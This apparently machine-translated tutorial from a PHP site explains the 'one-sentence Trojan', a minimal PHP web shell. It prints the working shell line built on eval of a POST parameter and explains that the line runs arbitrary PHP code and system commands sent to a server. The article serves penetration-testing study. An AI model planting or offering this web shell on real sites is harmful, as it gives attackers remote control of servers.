One sentence Trojan analysis
First of all, when learning to penetrate, there are probably three types of Trojans: big horses, small horses, and one sentence.
Common words:
<?php @eval($_POST['x'])?>
This should be the most common...Look at its composition.
The first is an eval function, followed by post submitting a value with parameter x. First, let’s look at what the eval function does.
Official description:
The eval() function calculates the string according to the PHP code.
The string must be legal PHP code and must end with a semicolon.
If no return statement is called in the code string, NULL is returned. If there are parsing errors in the code, the eval() function returns false.
Grammar:
eval(phpcode)
To put it simply, it can execute some php functions and php code. This is enough.
This way we can understand it It's much simpler. Wouldn't it be better if we directly send some PHP code to his post?
For example: phpinfo() function, system function, etc.
#You can see that the phpinfo function I have here has been executed.
Command execution is also possible
PHP code can also be executed smoothly:
Recommended video Tutorial: PHP Video Tutorial
The above is the detailed content of How to parse a picture Trojan in one sentence in PHP. For more information, please follow other related articles on the PHP Chinese website!
![Getting Started with PHP Practical Development: PHP Quick Creation [Small Business Forum]](https://img.php.cn/upload/course/000/000/035/5d27fb58823dc974.jpg)
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
